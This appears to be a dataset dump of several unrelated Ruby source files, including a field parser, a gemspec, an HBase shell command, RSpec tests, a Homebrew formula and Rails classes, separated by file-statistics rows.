FIELD_FORMAT_REGEX = /\A(\d+)(-\d+)?,"([^"]*)"\z/
class FormatError < StandardError
def initialize(message, field_spec)
super("Transaction field error for #{field_spec.inspect}: #{message}")
end
end
attr_accessor :id, :type, :multiple_occurrence, :type, :len_range, :precision, :description
def self.parse(str)
raise ArgumentError, "Invalid transaction field #{str.inspect}" if str !~ FIELD_FORMAT_REGEX
id = Integer(Regexp.last_match(1), 10)
occurrence = Regexp.last_match(2)
occurrence = Integer(occurrence, 10) unless occurrence.nil?
value = Regexp.last_match(3)
[id, occurrence, value]
end
def initialize(id, type, multiple_occurrence, len_range, precision, description)
self.id = id
self.type = type
self.multiple_occurrence = multiple_occurrence
self.len_range = len_range
self.precision = precision
self.description = description
end
def load(str)
raise FormatError.new(str.inspect, self) unless str =~ FIELD_FORMAT_REGEX
unless Integer(Regexp.last_match(1)) == id
raise FormatError.new("incorrect field id in #{str.inspect}", self)
end
FieldValue.new(self, RegExp.last_match(2), RegExp.last_match(1))
end
def inspect
"%s(id: %d, multiple_occurrence: %s, len_range: %s, precision: %s, description: %s)" % [
self.class, id, multiple_occurrence, len_range, precision.inspect, description
]
end
private
def type=(type)
unless %w(A A/N N AKE).include?(type)
raise FormatError.new("invalid type: #{type.inspect}", self)
end
@type = type
end
end
end
| 33.753846 | 98 | 0.680036 |
621ded682e0762fdd93e4df95fd6c700ca20e406 | 725 | # frozen_string_literal: true
Gem::Specification.new do |spec|
spec.name = "devportal"
spec.version = "0.1.06"
spec.authors = ["fraser milne"]
spec.email = ["[email protected]"]
spec.summary = "theme for mimikgit.github.io/devportal"
spec.homepage = "https://github.com/mimikgit/devportal"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0").select { |f| f.match(%r!^(assets|_layouts|_includes|_sass|LICENSE|README)!i) }
spec.add_runtime_dependency "jekyll", "~> 3.7"
spec.add_development_dependency "bundler", "~> 1.16"
spec.add_development_dependency "rake", "~> 12.0"
spec.add_development_dependency "sass", "~> 3.5"
end
| 34.52381 | 132 | 0.642759 |
f7a09878f24a6d64d968b01a78bef7d2203e888e | 1,358 | #
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module Shell
module Commands
class List < Command
def help
return <<-EOF
List all tables in hbase. Optional regular expression parameter could
be used to filter the output. Examples:
hbase> list
hbase> list 'abc.*'
hbase> list 'ns:abc.*'
hbase> list 'ns:.*'
EOF
end
def command(regex = ".*")
formatter.header([ "TABLE" ])
list = admin.list(regex)
list.each do |table|
formatter.row([ table ])
end
formatter.footer(list.size)
return list
end
end
end
end
| 27.714286 | 74 | 0.691458 |
2198f92ebd5142a9d3d6ac8de371bdcb27b4c6a5 | 1,058 | #!/usr/bin/ruby -w
# PART 13
# The shuffle method rearranges all the items of the array.
# Say you have a deck of cards. You shuffle them randomly.
# Note that there's always one possibility of not getting the
# deck shuffled at all!
# That said, [1, 2].shuffle can return either [2, 1] or [1, 2] itself!
[1, 2].shuffle # => [2, 1]
a = Array.new(10, &:next) # => [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
p a # => [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
p a.shuffle # => [1, 2, 3, 10, 7, 5, 6, 8, 4, 9]
# The bang method does the same job, except it modifies the
# original array without modifying the object_id
p a.shuffle! # => [5, 1, 6, 4, 9, 3, 7, 8, 2, 10]
p a # => [5, 1, 6, 4, 9, 3, 7, 8, 2, 10]
| 55.684211 | 110 | 0.385633 |
e987ff699cd4402d55f7d1948a3cb9d2690bbfd3 | 553 | require 'rails_helper'
RSpec.describe Bike, type: :model do
let(:user) {FactoryBot.create(:user)}
let(:bike) {FactoryBot.create(:bike, :user => user)}
it 'user after Factory valid with valid attributes' do
expect(user).to be_valid
end
it 'bike after Factory valid with valid attributes' do
expect(bike).to be_valid
end
subject { lot }
describe 'bike must have all important attributes' do
it { expect(:name).to be}
it { expect(:volume).to be}
it { expect(:year).to be}
it { expect(:colour).to be}
end
end | 22.12 | 56 | 0.670886 |
019042e9cf0d5eab0f58631d402f5b60535c9c86 | 1,748 | class Pygtk < Formula
desc "GTK+ bindings for Python"
homepage "http://www.pygtk.org/"
url "https://download.gnome.org/sources/pygtk/2.24/pygtk-2.24.0.tar.bz2"
sha256 "cd1c1ea265bd63ff669e92a2d3c2a88eb26bcd9e5363e0f82c896e649f206912"
revision 1
bottle do
cellar :any
rebuild 2
sha256 "89f5d6762155b369dae255ba2b3952cc09f43f899585ff8694370b6b151ca97e" => :sierra
sha256 "bfea679c1a46b35c7788a692869ddb576c2869900d25b72f6cf91e25edc409a9" => :el_capitan
sha256 "7b008b213a675e96a83edb7b1be8401bbc9bbeb5db9a926104897f99a8d7d61e" => :yosemite
sha256 "603694d87d2c6193caa164029bc441d93d45cdcd75419c8f8ed11b0902577457" => :mavericks
sha256 "493f7a3a4eb8cb9eaeef1bcada556f6887511d6f3fe052710eefd7af117d2861" => :x86_64_linux # glibc 2.19
end
depends_on "pkg-config" => :build
depends_on "glib"
depends_on "gtk+"
depends_on "atk"
depends_on "pygobject"
depends_on "py2cairo"
depends_on "libglade" => :optional
def install
ENV.append "CFLAGS", "-ObjC" if OS.mac?
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
# Fixing the pkgconfig file to find codegen, because it was moved from
# pygtk to pygobject. But our pkgfiles point into the cellar and in the
# pygtk-cellar there is no pygobject.
inreplace lib/"pkgconfig/pygtk-2.0.pc", "codegendir=${datadir}/pygobject/2.0/codegen", "codegendir=#{HOMEBREW_PREFIX}/share/pygobject/2.0/codegen"
inreplace bin/"pygtk-codegen-2.0", "exec_prefix=${prefix}", "exec_prefix=#{Formula["pygobject"].opt_prefix}"
end
test do
(testpath/"codegen.def").write("(define-enum asdf)")
system "#{bin}/pygtk-codegen-2.0", "codegen.def"
end
end
| 39.727273 | 150 | 0.731693 |
627b09c3e377fa22f31cf5fe49cecaa720754291 | 1,050 | require 'boxzooka/inbound_request_item'
module Boxzooka
# Inbound data set is used to send notifications to our system of product inventory
# that you’re sending to Boxzooka.
# In practice, you must hit a CatalogRequest for all of the items listed here before the Inbound
# will be accepted.
class InboundRequest < BaseRequest
root node_name: 'Inbound'
# ID of incoming shipping container
scalar :container_id, node_name: 'ContainerID'
# Carrier being used for shipment
scalar :carrier
# Date/Time that shipment is estimated to arrive in our warehouse.
scalar :estimated_delivery_date, type: :datetime
# Purchase order number
scalar :po, node_name: 'PO'
# Tracking number of shipment
scalar :tracking_code
# Date/Time that inventory was shipped
scalar :ship_date, type: :datetime
# Items on the Inbound shipment.
collection :items,
flat: true,
entry_field_type: :entity,
entry_type: Boxzooka::InboundRequestItem,
entry_node_name: 'Item'
end
end
| 27.631579 | 98 | 0.719048 |
ffe389ef0eb339f7bb03593f33c0ab71b16f2a99 | 872 | # PLEASE DO NOT EDIT THIS CODE
# This code was generated using the UMPLE 1.31.1.5860.78bb27cc6 modeling language!
# NOTE: Ruby generator is experimental and is missing some features available in
# in other Umple generated languages like Java or PHP
module CruiseAttributesTest
require 'date'
require 'time'
class ConstDefault
#------------------------
# STATIC VARIABLES
#------------------------
I1 = 0;
I2 = 0;
D1 = 0.0;
D2 = 0.0;
F1 = 0.0;
F2 = 0.0;
B1 = false;
B2 = false;
STR = "";
DATE = Date.parse("2021-10-26");
TIME = Time.parse("00:00:00");
#------------------------
# CONSTRUCTOR
#------------------------
def initialize()
@initialized = false
@deleted = false
@initialized = true
end
#------------------------
# INTERFACE
#------------------------
def delete
@deleted = true
end
end
end | 18.166667 | 82 | 0.533257 |
e9d3dbe9db3e3e6c7b87a48218165186bf5eb420 | 1,993 | require 'rails_helper'
# This spec was generated by rspec-rails when you ran the scaffold generator.
# It demonstrates how one might use RSpec to test the controller code that
# was generated by Rails when you ran the scaffold generator.
#
# It assumes that the implementation code is generated by the rails scaffold
# generator. If you are using any extension libraries to generate different
# controller code, this generated spec may or may not pass.
#
# It only uses APIs available in rails and/or rspec-rails. There are a number
# of tools you can use to make these specs even more expressive, but we're
# sticking to rails and rspec-rails APIs to keep things simple and stable.
<% module_namespacing do -%>
RSpec.describe "PATCH /<%= name.underscore.pluralize %>/:id", <%= type_metatag(:request) %> do
<% if mountable_engine? -%>
include Engine.routes.url_helpers
<% end -%>
let!(:<%= name.underscore %>) {create(:<%= name.underscore %>)}
context "with valid parameters" do
let(:new_attributes) {
skip("Add a hash of attributes valid for your model")
}
it "updates the requested <%= ns_file_name %>" do
patch <%= show_helper.tr('@', '') %>, params: { <%= singular_table_name %>: new_attributes }
<%= file_name %>.reload
skip("Add assertions for updated state")
end
it "redirects to the <%= ns_file_name %>" do
patch <%= show_helper.tr('@', '') %>, params: { <%= singular_table_name %>: new_attributes }
<%= file_name %>.reload
expect(response).to redirect_to(<%= singular_table_name %>_url(<%= file_name %>))
end
end
context "with invalid parameters" do
let(:invalid_attributes) {
skip("Add a hash of attributes invalid for your model")
}
it "renders a successful response (i.e. to display the 'edit' template)" do
patch <%= show_helper.tr('@', '') %>, params: { <%= singular_table_name %>: invalid_attributes }
expect(response).to be_successful
end
end
end
<% end -%>
| 38.326923 | 102 | 0.680381 |
f81ad0011ac4f15d0eb3243992550d68367ac0af | 351 | # Delineate the directory for SASS/SCSS files
sass_path = File.dirname(__FILE__);
# Delineate the CSS dir
css_path = File.join(sass_path, '..', 'css')
# Delineate the images dir
images_dir = File.join(sass_path, '..', 'img')
# Load the Sencha Touch framework
load File.join(sass_path, '..', 'css')
output_style = :compressed
environment = :production | 31.909091 | 46 | 0.729345 |
b919c01ce73ec6bc9d4a61f1b5caae646655c866 | 427 | class MiqRetireRequest < MiqRequest
# subclasses must set this
SOURCE_CLASS_NAME = nil
validates :request_state, :inclusion => { :in => %w(pending finished) + ACTIVE_STATES, :message => "should be pending, #{ACTIVE_STATES.join(", ")} or finished" }
validate :must_have_user
default_value_for(:source_id) { |r| r.get_option(:src_id) }
default_value_for :source_type, SOURCE_CLASS_NAME
def my_zone
end
end
| 30.5 | 163 | 0.725995 |
399209e8fe688d54aedd49fdff1a870dcda5cc6f | 112 | FactoryBot.define do
factory :user do
email { '[email protected]' }
password { 'my-password' }
end
end
| 16 | 30 | 0.642857 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.